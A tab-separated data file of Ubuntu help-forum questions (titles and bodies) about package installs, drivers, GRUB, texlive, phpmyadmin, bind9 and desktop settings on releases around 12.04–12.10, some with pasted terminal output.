261756	how do i deploy a charm when it is shown in the charm store but the cli reports it 's not found ?	i am trying to deploy marco ceppi 's discourse charm from this link however running `` juju deploy discourse '' yields the following output : pgrace @ shaman : ~ $ juju deploy discourse 2013-02-26 20:49:05,541 info searching for charm cs : precise/discourse in charm store 2013-02-26 20:49:06,076 error error processing 'cs : precise/discourse ' : entry not found i feel as though i 'm missing something . executing juju deploy lp : ~marcoceppi/charms/precise/discourse/trunk yields this result : pgrace @ shaman : ~ $ juju deploy lp : ~marcoceppi/charms/precise/discourse/trunk 2013-02-26 20:50:25,781 error bad charm url 'lp : ~marcoceppi/charms/precise/discourse/trunk ' : invalid schema ( url inferred from 'lp : ~marcoceppi/charms/precise/discourse/trunk ' ) is there a certain syntax to loading charms not in the charm store ?
261760	setting global environment variable for everyone	if i set a variable in /etc/environment , it only seems to apply to administrators while in sudo su . how can i get the variables to apply to everyone ? especially when they are in terminal ? do the settings in /etc/enviroment not apply to bash ?
261763	install twitter web app if i declined the first time	i was going to install twitter web app so it could integrate with unity , but i missclicked ( yeah what a dumbass ) and declined to do so . now i have refreshed the page several times , and the alert with the suggestion does n't appear ... . any way to force that firefox behavior ? ? ? thanks in advance .
261768	what is the ethernet driver in ubuntu 12.10 ?	i have been asked by the it people at my work to uninstall and reinstall my ethernet driver in order to try and fix a connection problem . when looking in software centre , i find those packages when searching for the word `` ethernet '' : which package do you think i should uninstall and reinstall ? and will it also disable my wireless connection ? ( i.e . will i be able to reinstall the driver afterwards if i end up without internet connection ? ) edit : here is the result of lspci -nnk | grep -ia2 net : 02:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) [ 168c:001c ] ( rev 01 ) subsystem : askey computer corp. device [ 144f:7131 ] kernel driver in use : ath5k 03:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] ( rev 13 ) subsystem : samsung electronics co ltd device [ 144d : c052 ] kernel driver in use : sky2
261772	how to visually display dependencies of a package ?	this is just for fun and curiosity : is there a tool using which i can visually see the dependencies of a package as a graph ? that is , the packages that a given package depends on . this can be a command-line tool that displays using ascii graphics ( like tree or mercurial 's graphlog ) or a gui tool that shows the dependency graph visually . any other combination of tools that can show the dependencies visually works too .
261774	how to text to speech ( pdf , docx ) documents in lubuntu 12.10	hello i want text to speech application that works with pdf and other files . is there any application that does this is lubuntu ? is there any way to get this done ?
261775	freeze while installing server 12.10 from usb	i 'm putting together a new computer and trying to install ubuntu server 12.10 from usb ( no optical drive ) . i 'm using the amd 64 bit installer ( md5 checksum reported fine ) and pendrive to put it on my usb drive . when i start the computer with the usb drive connected , i get to an initial language select screen and then to the boot screen ( the one with the option to install , do a memory test , etc ) . when i select `` install ubuntu server '' i 'm taken to another language selection screen where i 'm unable to do anything but hard shutdown the computer ( no keyboard or mouse input accepted ) . how can i fix this freeze ? additional info : usb appears to look like a uefi drive in bios while a ssd is first in boot order , it 's a blank drive ( as are the hdds ) using wireless usb keyboard the whole time . keyboard works with other devices legacy usb support is enabled using an amd apu c-60
261783	how to boot external drives on a acer c7 chromebook	i want to run a plain ubuntu install , but the bios does not easily allow for booting into usb drives . i currently have the chromebook in developer mode and i found a usb command on the chromium developer info website , but i not sure how to enter the command in .
261784	just ran some updates , broke system and stuck in unity 2d	i just installed 25 updates . in them were the raring graphics stack and kernel 3.5.25 . i rebooted back and noticed i was now in unity 2d . this behaves much slower than 3d did and when i tried to log out to lightdm the screen went blank blue . i force restarted the computer and am back in fallback . i tried unity -- restart however it says it is a deprecated . with the computer in the current state , returning to the log in screen results in a blank screen that matches the color unity inherits from the background . i also noticed gnome control center crashes when trying to enter `` display settings '' . i wanted to enter display , because for some reason ubuntu 's default resolution is set to have an extra 6 pixels horizontally . i notice the screen shift when my mouse touches either edge of the screen . the recommended resolution ( with 6 pixels less horizontally ) is available right below in the drop down that is now inaccessible . mikey @ mikey-lenovo-u410 : ~ $ unity -- version unity 6.12.0 mikey @ mikey-lenovo-u410 : ~ $ uname -r 3.5.0-25-generic mikey @ mikey-lenovo-u410 : ~ $ when typing 'unity ' into terminal i get this output , the terminal never completes the command and i have to ctrl+c to get control back . i also noticed the mouse cursor will only show if my finger is on the touchpad and moving . i assume this is a result of unity fallback . i 'm using the default ppas . i only added steam and google chrome stable ppa to the system other than the defaults . after the update i noticed it now registers a name for the graphics devices . i 'm also using the default video drivers . i 've only installed steam , chrome and powertop http : //i.imgur.com/3nwx60z.png $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 04:00.0 network controller : intel corporation centrino wireless-n 2200 ( rev c4 ) $ lspci -nnk | grep -a3 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : lenovo device [ 17aa:3977 ] kernel modules : i915 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) mikey @ mikey-lenovo-u410 : ~ $
261787	nexus 7 installer gets stuck on 'erasing boot partition '' help what to do next ?	i have tried installing the ubuntu touch with the nexus 7 ubuntu core installer on ubuntu 12.10 64bit in a vmware virtual machine . it looks like its stuck on erasing boot partition . i have read elsewhere that someone else had this problem : nexus 7 installer gets stuck on 'erasing boot partition '' but what i dont know is , can i disconnect my nexus 7 and reboot it , or will it not be able to boot into the android fastboot recovery screen anymore ? also is it safe right now to cancel the ubuntu touch installer and try again or try the manual steps ? just want to know whats safe to do and how to fix my problem . : ) any help would be greatly appreciated . also is this the wrong guide ? https : //wiki.ubuntu.com/nexus7/installation okay so i want this guide i think : https : //wiki.ubuntu.com/touch/install is it safe to cancel the first one and just start the second one in the current state my device is in ? its still powered on and showing the fastboot android logo / menu ?
261791	how to set the scroll speed of apple magic mouse ?	how to set the scroll speed of apple magic mouse ? i only found the moving speed .
261792	oracle xe prompts removal of kubuntu desktop 12.04	i was trying to install oracle-xe 10g on kubuntu 12.04 x64 . i had to install the i386 version of bc and it prompted me to remove kubuntu desktop and cups printing driver . sudo apt-get install bc : i386 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgpm2 : i386 libncurses5 : i386 libreadline6 : i386 libtinfo5 : i386 suggested packages : gpm : i386 the following packages will be removed : bc bluez-cups cups hplip kubuntu-desktop printer-driver-gutenprint printer-driver-hpcups printer-driver-postscript-hp the following new packages will be installed : bc : i386 libgpm2 : i386 libncurses5 : i386 libreadline6 : i386 libtinfo5 : i386 after installing oracle-xe , if i try to install back kubuntu desktop , it prompts to remove oracle-xe . sudo apt-get install kubuntu-desktop cups [ sudo ] password for sysadmin : reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libreadline6 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : bc bluez-cups hplip printer-driver-gutenprint printer-driver-hpcups printer-driver-postscript-hp suggested packages : cups-pdf hplip-gui hplip-doc python-notify system-config-printer gutenprint-doc gutenprint-locales the following packages will be removed : bc : i386 oracle-xe-universal : i386 is there no way to keep both ?
261797	kde desktop environment alongside gnome	i 'm using ubuntu and i would like to experience kde desktop environment . i have installed kde in full mode using apt-get install with no error but no further effects occurred . i do n't know how to use my installation , start in kde mode and switch between unity and kde .
261810	wubi for windows 7 on sony vaio is not working	i have installed ubuntu using wubi on my windows 7 machine ( sony vaio ) . everything installed perfectly , but whenever i reboot my system there is no ubuntu ( there is no dual boot menu ) . i checked my windows setting and it seems there is only windows ( it could not recognize ubuntu ) . could anyone help me how to solve this problem .
261813	wireless switch controls bluetooth - lenovo thinkpad - ubuntu 12.10	on windows the key was intended to control both wireless and bluetooth but on ubuntu the switch key when pressed only enables/disables bluetooth and the wireless network adapter is absent under network settings too .
261817	how to change my uid back in passwd file ?	my os is ubuntu 12.10 , and my account is called acgtyrant , and its uid is 1000 . for the need of researching , i changed my uid from 1000 to 1010 in /etc/passwd , and then i found my files ' master changed to a number:1000 , which prove my suppose . but when i try to change my uid back , i found i ca n't edit the passwd file any more ! because when i try to run sudo vim /etc/passwd , the bash told me sudo : unknown uid 1000 : who are you ? . so how to solve it ? acctually i am a chinese student , so forgive my poor english please .
261820	ubuntu 12.10 eclipse ide opens py file with gedit ( default ) cant run file from gedit ? cant switch default to eclipse ?	i am trying to run a simple 'hello world '' py file in eclipse and the file opens with gedit or gvim and i cant seem to get it to run . so i installed eclipse and i cant seem to get the py file i select to open in the eclipse ide ... attempting to install py dev to fix this
261822	ubuntu 12.10 slow download speed	i 'm using ubuntu 12.10 . although system is quite fast , i have a very slow download speed . can anyone help me to fix it ? thanks !
261824	how to change the default user name from ubuntu to something else on ec2 ami	how can i create a new ubuntu ami so that when a new instance is created the ssh credentials are copied under a different user than ubuntu ( e.g . /home/administrator/.ssh/ ) ? in short , i need to be able to use username administrator instead of ubuntu .
261837	no sound after installing ubuntu 12 along side windows 8	i am a total new comer to ubuntu . i got a livecd from ubuntu.com and did the install . installed windows 8 on one partition and ubuntu on another . after the install , everything is great and i am enjoying the os , except when i play a youtube video , i get no sound . now i realize i am not getting any sound from either ubuntu or windows 8 . please help me .
261839	weird bind9 behavior	this problem has been bothering me for 2 days and hope you guys can give me some advice . i try to set up outlook.com as my mail service . and of course it require me to update my mx record to point to microsoft 's server . and now , the problem is , no matter how i set the mx record , the value always end with my domain name . for example my domain is abc.com and i 'm using bind 9.7.3 . please refer the script below . but when i query using nslookup either using command line or online tool . i get the exchange value as a2d53f710931b4f6.pamx1.hotmail.com.abc.com . i tried the same thing on another server at a different datacenter and it turns out to be fine . do you guys have any idea what 's wrong here ? is it my new server 's bind default setting problem or the network provider setting that effect it ? $ origin abc.com . @ in soa ns1.abc.com . postmaster.abc.com . ( 2013022427 8h 2h 7d 1d ) in ns ns1.abc.com . in ns ns2.abc.com . in mx 10 a2d53f710931b4f6.pamx1.hotmail.com
261843	how do i resume an interrupted video stream recording ?	i 'm trying to start a recording every evening , starting from 19:00 and stopping at 02:00 . the webcam does export its stream as rtsp video stream and i am able to start the recording correctly with vlc using this : filename= '' /path/to/video-`date + % y % m % d % h % m`.mp4 '' length=25200 cvlc rtsp : //192.168.2.186/play2.sdp\ -- sout= '' # std { access=file , mux=ps , dst= $ filename } '' \ -- run-time= $ length\ -- play-and-exit for some reason it sometimes loses the connection ( my guess is the wifi is blocked ) . no matter how hard i try i ca n't get vlc to reconnect and just continue writing to the file where it left off . any pointers to what i should be looking into ?
261850	which 12.10 desktop version should i use for hp prolaint n54l ?	i recently purchased the hp proliant n54l microserver to use as a simple fileshare/server at home . i am new to ubuntu and servers , which is why i 'm going to install the desktop rather than the server edition ( sadly i need the gui ) . which version would you recommend ? 32-bit or 64-bit ? any other advice ?
261857	removing and re-installing texlive 2012	i have a problem with texlive . for some reason i could n't load the siunitx package anymore . because i had problems with texlive before , i accidently installed 2 versions next to each other with them having path dependencies . for some reason i ca n't recall i then decided just to delete texlive by just removing all the folders in which tex was present . now i tried to reinstall texlive , http : //askubuntu.com/a/163683/27480 . but during the install the following error occured : [ 09:43|0 ] $ sudo apt-get install texlive-full reading package lists ... done building dependency tree reading state information ... done suggested packages : passivetex jadetex xmltex the following new packages will be installed : texlive-full 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 22 not fully installed or removed . need to get 0 b/37.3 kb of archives . after this operation , 106 kb of additional disk space will be used . selecting previously unselected package texlive-full . ( reading database ... 630109 files and directories currently installed . ) unpacking texlive-full ( from ... /texlive-full_2012.20120611-3~ubuntu12.04.1_all.deb ) ... setting up tex-common ( 3.13~ubuntu12.04.1 ) ... directory /etc/texmf/ not writeable . exiting . dpkg : error processing tex-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of cm-super : cm-super depends on tex-common ( > = 2.00 ) ; however : package tex-common is not configured yet . dpkg : error processing cm-super ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of context : context depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing context ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of context-modules : context-modules depends on context ( > > 2011 ) ; however : package context is not configured yet . context-modules depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing context-modules ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems pno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already revent configuration of latex-cjk-chinese : latex-cjk-chinese depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing latex-cjk-chinese ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-cjk-japanese : latex-cjk-japanese depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing latex-cjk-japanese ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-cjk-korean : latex-cjk-korean depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing latex-cjk-korean ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-cjk-thai : latex-cjk-thai depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing latex-cjk-thai ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-cjk-all : latex-cjk-all depends on latex-cjk-chinese ( > = 4.8.3+git20120621-1~ubuntu12.04.1 ) ; however : package latex-cjk-chinese is not configured yet . latex-cjk-all depends on latex-cjk-japanese ( > = 4.8.3+git20120621-1~ubuntu12.04.1 ) ; however : package latex-cjk-japanese is not configured yet . latex-cjk-all depends on latex-cjk-korean ( = 4.8.3+git20120621-1~ubuntu12.04.1 ) ; however : package latex-cjk-korean is not configured yet . latex-cjk-all depends on latex-cjk-thai ( = 4.8.3+git20120621-1~ubuntu12.04.1 ) ; however : package latex-cjk-thai is not configured yet . dpkg : error processing latex-cjk-all ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of latex-fonts-thai-tlwg : latex-fonts-thai-tlwg depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing latex-fonts-thai-tlwg ( -- configure ) : dependency problems - leaving unconfigured setting up m-tx ( 0.60d-5~ubuntu12.04.1 ) ... warning : kpathsea : configuration file texmf.cnf not found in these directories : /etc/texmf/web2c : /usr/share/texlive/texmf/web2c : /usr/share/texlive/texmf-dist/web2c : /usr/local/share/texmf/web2c . /var/lib/dpkg/info/m-tx.postinst : 17 : /var/lib/dpkg/info/m-tx.postinst : $ texmfmain/web2c/mktexupd : not found dpkg : error processing m-tx ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of musixtex : musixtex depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing musixtex ( -- configure ) : dependency problems - leaving unconfigured setting up pmx ( 2.6.18-2~ubuntu12.04.1 ) ... no apport report written because maxreports is reached already no apport report written because maxreports is reached already warning : kpathsea : configuration file texmf.cnf not found in these directories : /etc/texmf/web2c : /usr/share/texlive/texmf/web2c : /usr/share/texlive/texmf-dist/web2c : /usr/local/share/texmf/web2c . /var/lib/dpkg/info/pmx.postinst : 16 : /var/lib/dpkg/info/pmx.postinst : $ texmfmain/web2c/mktexupd : not found dpkg : error processing pmx ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of texlive-formats-extra : texlive-formats-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-formats-extra ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-lang-cjk : texlive-lang-cjk depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-lang-cjk ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-lang-cyrillic : texlive-lang-cyrillic depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-lang-cyrillic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration ofno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already texlive-lang-czechslovak : texlive-lang-czechslovak depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-lang-czechslovak ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-lang-polish : texlive-lang-polish depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-lang-polish ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-xetex : texlive-xetex depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-xetex ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-math-extra : texlive-math-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-math-extra ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-music : texlive-music depends on musixtex ( > = 1:0.114-2 ) ; however : package musixtex is not configured yet . texlive-music depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-music depends on m-tx ; however : package m-tx is not configured yet . texlive-music depends on pmx ; however : package pmx is not configured yet . dpkg : error processing texlive-music ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-omega : texlive-omega depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing texlive-omega ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of texlive-full : texlive-full depends on texlive-lang-czechslovak ( > = 2012.20120516 ) ; however : package texlive-lang-czechslovak is not configured yet . texlive-full depends on texlive-music ( > = 2012.20120516 ) ; however : package texlive-music is not configured yet . texlive-full depends on texlive-lang-cjk ( > = 2012.20120516 ) ; however : package texlive-lang-cjk is not configured yet . texlive-full depends on latex-cjk-all ( > = 4.6.0+cvs20060714-2 ) ; however : package latex-cjk-all is not configured yet . texlive-full depends on texlive-formats-extra ( > = 2012.20120516 ) ; however : package texlive-formats-extra is not configured yet . texlive-full depends on texlive-xetex ( > = 2012.20120516 ) ; however : package texlive-xetex is not configured yet . texlive-full depends on texlive-math-extra ( > = 2012.20120516 ) ; however : package texlive-math-extra is not configured yet . texlive-full depends on texlive-lang-polish ( > = 2012.20120516 ) ; however : package texlive-lang-polish is not configured yet . texlive-full depends on cm-super ( > = 0.3.3-3 ) ; however : package cm-super is not configured yet . texlive-full depends on texlive-omega ( > = 2012.20120516 ) ; however : package texlive-omega is not configured yet . texlive-full depends on texlive-lang-cyrillic ( > = 2012.20120516 ) ; however : package texlive-lang-cyrillic is not configured yet . texlive-full depends on context ; however : package context is not configured yet . dpkg : error processing texlive-full ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : tex-common cm-super context context-modules latex-cjk-chinese latex-cjk-japanese latex-cjk-korean latex-cjk-thai latex-cjk-all latex-fonts-thai-tlwg m-tx musixtex pmx texlive-formats-extra texlive-lang-cjk texlive-lang-cyrillic texlive-lang-czechslovak texlive-lang-polish texlive-xetex texlive-math-extra texlive-music texlive-omega texlive-full e : sub-process /usr/bin/dpkg returned an error code ( 1 )
261858	the phpmyadmin configuration storage is not completely configured	i typed apt-get install phpmyadmin and ran into an error saying it can not connect to mysql ( socket issue ) . it was normal because i forget to install mysql before , so i selected `` abort '' above all options given by phpmyadmin . then sudo tasksel and installed lamp server . once finished , i ran : apt-get remove -- purge phpmyadmin apt-get install phpmyadmin then mysql -u root -p but i got the following error : access denied for the following user 'root ' @ 'localhost' so i solved this problem by doing : mysql set password for root @ localhost=password ( 'mypassword ' ) ; grant all privileges on * . * to root @ localhost identified by 'mypassword ' with grant option ; then i successfully logged in localhost/phpmyadmin , but found this message : the phpmyadmin configuration storage is not completely configured , some extended features have been deactivated . to find out why click here . i clicked here , and it showed me : can i go on peacefully with mysql/phpmyadmin ?
261860	is there any way to hide or remove the backup files in xfce desktop	in my xubuntu 12.04 i already updated to xfce 4.10 , but when i put text files on the desktop there is always backup files created . even though i use the shortcut link of that text file on my desktop , still the same result . i mean for each of the text file i edit there is always the backup files with them . is there any solution ? or do i have to access the files from some folder ?
261861	how to start two ubuntu applications in one go ?	lets suppose that there are two binary files , e.g . xxx and yyy , at destination /usr/bin/ . i want to start them at once , always ! in other words , when i type the name of either of those in unity , i want to make both of them start . how could i change the corresponding files at destination /home/username/.local/applications/ to do so ? i tried this /usr/bin/xxx ; /usr/bin/yyy ; on terminal but it does n't seem to work .
261870	invalid host for ssh forwarding : ssh : could not resolve hostname	actually trying to insatll maas server with ubuntu 12.04 and juju . once installed , tried to add a new node in mass gui . it seems wol worked and os was installed , the new node had been deployed and running . however , when trying juju status after bootsrapping the environement , it seems something goes wrong with the dns server . $ juju status info connecting to environment ... error invalid host for ssh forwarding : ssh : could not resolve hostname node01 : name or service not known maas-dhcp is installed and configured in the maas server . no dns service was added but use the default one ( 127.0.0.1 in /etc/resolv.conf file ) . chcek the /var/lib/misc/dnsmasq.leases . no entries for the specified node ! any idea ?
261872	installation of ubuntu 12.10 on a tablet pc	i have a intel x86 based tablet with the following configuratioin : processor-atom n2600 1.6ghz , memory 2gb , ssd 32gb and is touch enabled . i install ubuntu 12.10 and it detects everything from wireless to camera to bluetooth from the word go . touch works from the word go . then it ejects the cd from the external cdrom drive and tells you to remove media and press enter to reboot . it hangs here . i restart myself . the following are some of the messages that are on the black and white screen when its booting : modem-manager [ 781 ] : < info > successfully loaded 20 plugins starting mdns/dns-sd daemon [ ok ] starting configure virtual network devices [ ok ] skipping profile in /etc/appamor.d/disable : usr.bin.firefox skipping profile in /etc/appamor.d/disable : usr.sbin.rsyslogd [ ok ] *stopping system v initialization compability [ ok ] *starting automatic crash report generation [ ok ] . . . and stops at the following *stopping save kernel messages [ ok ] what do i need to do to make this work ?
261880	backuppc : client host running windows 7 and mac osx	i would like to setup backuppc to backup files when the remote hosts are running windows 7 or mac osx . thunk 's for your help
261881	radeon 13.1 legacy driver and xserver 1.13	is the latest radeon legacy driver compatible with xserver 1.13 ? i have hd4xxx and hd5xxx video cards on my laptop . i want to install ubuntu 12.10 but not sure if everything will be ok with legacy driver .
261883	wired network device not managed	after installing ubuntu into my computer the wired network dives are not working they appear in active in the icon bar . i have installed the network manager but still they are in active though i can browse in my computer . wanting to change ip address i cant because the icon is in active .
261886	required programming languages to write a own application in ubuntu ?	what are the minimum requirements to write an ubuntu app ?
261892	ubuntu and macos x full disk encryption easily possible ?	i got a macbook pro 9,1 ( mid 2012 ) and plan on finally switching from macos x as main system and windows for games , to ubuntu as main one and macos x just for firmware updates . how would i do that , while still being able to use the full disk encryption from the ubuntu installer ( so easy ) . because last time i tried , w/ my macos x volume fully encrypted , w/ recovery , ubuntu would only let me use fde , if i had erased the whole disk again and started over . macos x full disk encryption is n't really needed , if i plan on just keeping it around for updates to the hardware . or would you just kill macos x altogether ? and boot it from an external hd , if there 's a hardware update available , or i wan na edit/disable my firmware password .
261894	grub prompts for which drives to install on after apt-get upgrade	i have a little diffuse question . i recently wanted to upgrade my nginx installation on one of my servers running ubuntu 12.04 . i read somewhere that this should be done by running apt-get upgrade nginx -f - however that seems to be wrong , because my server started to upgrade a lot of packages - including grub - and this is what my question is about . it prompted me for telling which device or partition to install grub to , and it something about installing it to all if unsure . i ended up aborting the installation , and then it told me that my server might not boot correctly if i restarted it , because i did n't specify the devices or something . as you might have expected i have no knowledge about grub , and my question is therefor : is there currently something wrong after i aborted the apt-get upgrade ? how do i now ensure that everything is ok ? can i safely restart my server ( if i one day need that ) ? i have a raid 1 array over my two 3tb disks . here is some info about the system : first : df -1 filesystem 1k-blocks used available use % mounted on /dev/md2 1065281580 2449292 1009145256 1 % / udev 16310664 12 16310652 1 % /dev tmpfs 6527992 328 6527664 1 % /run none 5120 0 5120 0 % /run/lock none 16319972 0 16319972 0 % /run/shm cgroup 16319972 0 16319972 0 % /sys/fs/cgroup /dev/md3 1828890816 9885048 1726835052 1 % /home /dev/md1 507836 45060 436564 10 % /boot disk /dev/md1 does n't contain a valid partition table second : cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md1 : active raid1 sda2 [ 0 ] sdb2 [ 1 ] 524276 blocks super 1.2 [ 2/2 ] [ uu ] md0 : active raid1 sda1 [ 0 ] sdb1 [ 1 ] 12581816 blocks super 1.2 [ 2/2 ] [ uu ] md2 : active raid1 sda3 [ 0 ] sdb3 [ 1 ] 1073740664 blocks super 1.2 [ 2/2 ] [ uu ] md3 : active raid1 sda4 [ 0 ] sdb4 [ 1 ] 1843414335 blocks super 1.2 [ 2/2 ] [ uu ] third : gdisk -l /dev/sda gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . disk /dev/sda : 5860533168 sectors , 2.7 tib logical sector size : 512 bytes disk identifier ( guid ) : e7cd481a-663e-4312-afc0-e72669da4e34 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 5860533134 partitions will be aligned on 2048-sector boundaries total free space is 2014 sectors ( 1007.0 kib ) number start ( sector ) end ( sector ) size code name 1 4096 25169919 12.0 gib fd00 2 25169920 26218495 512.0 mib fd00 3 26218496 2173702143 1024.0 gib fd00 4 2173702144 5860533134 1.7 tib fd00 5 2048 4095 1024.0 kib ef02 fourth : gdisk -l /dev/sdb gpt fdisk ( gdisk ) version 0.8.1 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . disk /dev/sdb : 5860533168 sectors , 2.7 tib logical sector size : 512 bytes disk identifier ( guid ) : 3fd386df-a293-4a31-86ff-1e1ef5ca6566 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 5860533134 partitions will be aligned on 2048-sector boundaries total free space is 2014 sectors ( 1007.0 kib ) number start ( sector ) end ( sector ) size code name 1 4096 25169919 12.0 gib fd00 2 25169920 26218495 512.0 mib fd00 3 26218496 2173702143 1024.0 gib fd00 4 2173702144 5860533134 1.7 tib fd00 5 2048 4095 1024.0 kib ef02
261897	ubuntu 12.04 gnome classic and unity launcher	is there any possibility to get the new unity launcher while having the gnome classic desktop ? i enabled the classic desktop as described : how to revert to gnome classic desktop ?
261899	run a screen session on boot from rc.local	i am trying to run a detached screen under a specific user in rc.local on boot . the code below is what i have so far , but it is not working for me . the su part seems to be giving me an error . su - username -c /usr/bin/screen -dms test bash -c '/var/www/path/to/script/script.sh ; exec bash'
261900	how do i open a text file in my terminal ?	there is a file named results.txt and i want to open this file in my terminal . ( i mean i want to see the file contents be displayed in the terminal and not in some text editor ) how do i do that ?
261904	is there a way to save username and password for print authentication ?	i saw this this question and followed its answer , but the problem persists for me . once i send a document to print , this dialog box ( in figure ) opens up and shows `` held for authentication '' . then i right-click and enter my username and password and then the pdf is sent to the network printer . is there a way to store my username and password ? the 'remember password ' option does not work . i do not want to remove authentication ( ca n't see how the network printer will identify me if i am not authenticated , as the network is based on windows ) , i just want to save my username and password into some appropriate file so that i do not have to key in every time .
261908	prevent xsession-errors	i am having an issues with my ~/.xsession-errors file filling up my entire drive ( 128g ) in a couple of days . infact , once it was in a few hours . i run this machine as a server , so it runs for days with out reboot . i have read some solutions about how to remove the file via cron , or redirect it to /dev/null . my concern though is that my home is on a ssd and i do n't want to waste the drive i/o with a bunch of writes i do n't want . how can i prevent it from writing ? ? also , if anyone could explain what this file is , and why it has so many errors , i would appreciate it . does it have to do with my remote sessions vnc/ssh . update : it seems to go up in size every time i remote vnc in using `` desktop sharing '' .
261909	show time and date in ubuntu 12.04	i 'm using gnome classic in ubuntu 12.04 . i inadvertently deleted some files , and after that i 'm not able to find the settings that would allow me to display the date and time . how can i make the date and time appear ?
